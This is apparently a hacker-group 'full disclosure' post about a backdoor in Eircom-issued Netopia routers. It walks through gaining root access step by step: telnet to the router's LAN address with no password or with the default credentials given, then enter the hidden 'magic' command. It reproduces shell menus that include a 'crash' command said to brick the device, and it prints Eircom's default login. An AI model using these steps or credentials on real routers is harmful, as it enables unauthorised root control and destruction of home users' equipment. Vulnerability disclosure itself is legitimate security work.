|
++++++++++++++++++++
FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!
Yes, failcom suck, and they did it again. DERP!
They gave us a nice TELNET shell into their routers, and now we can
mess about 'cos it spawns a root shell by magic! (and magic is the
actual command!)
They also left a lovely web interface with supposed remote access
capability, but i have to test that fully.
Thanks to this, evil people could be hiding "in your switches
rerouting your riches!'
Disclosed by: Netcat, Hex, Chess.
++++++++++++++++++++
Netopia SOC OS version 7.8.0 has a simple TELNET backdoor.
If a malicious attacker is on the local area network of a Netopia
router, and they TELNET to 192.168.1.254 they are greeted with the
following prompt... There is no password needed!
++++++++++++++++++++
Terminal shell v1.0
Copyright ©2008 Motorola, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed
Switch
Running Netopia SOC OS version 7.8.0 (build r2)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/146306722576>
++++++++++++++++++++
If it does ask for a passphrase, we found admin/admin and
admin/password worked every time in the wild.
At the 'Admin shell' a help command gives you the following menu...
++++++++++++++++++++
Netopia-2000/146306722576> help
arp to send ARP request
atmping to send ATM OAM loopback
clear to erase all stored configuration
information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication
info
install to download and program an image into
flash
license to enter an upgrade key to add a
feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log
level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
show to show system information
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
wan_type to Set WAN interface type
who to show who is using the shell
? to get help: "help all" or "help help"
wps to issue Wireless Protected Setup
commands
Netopia-2000/146306722576>
++++++++++++++++++++
However, typing the command 'magic' (not listed) brings up a new
shell...
++++++++++++++++++++
Netopia-2000/146306722576> magic
(poof!)
Netopia-2000/146306722576# help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration
information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication
info
install to download and program an image into
flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a
feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log
level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server.
Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
wan_type to Set WAN interface type
ata to issue commands related to remote
ATA configuration
who to show who is using the shell
access_code to show if access code is valid
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
wps to issue Wireless Protected Setup
commands
Netopia-2000/146306722576#
+++++++++++++++++++++++
The 'Crash' command literally bricks the router. This shell is the
root shell.
It gets even worse though... It hasa lovely web
interface if you open that web address in a browser!
+++++++++++++++++++++++
A malicious attacker on the LAN can do all kinds of things...
+++++++++++++++++++++++
ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE
VULNERABLE.
THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION
ALGORITHM.
Not to mention, Eircoms default login is always:
eircom@eircom.net
broadband1
+++++++++++++++++++++++
Thanks for reading!
soon to come... can we overflow bit torrent buffers?
|